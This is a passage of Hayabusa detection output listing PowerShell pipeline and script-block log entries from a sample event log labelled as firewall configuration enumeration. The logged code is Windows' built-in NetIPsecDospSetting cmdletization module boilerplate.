[switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterTyp",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = 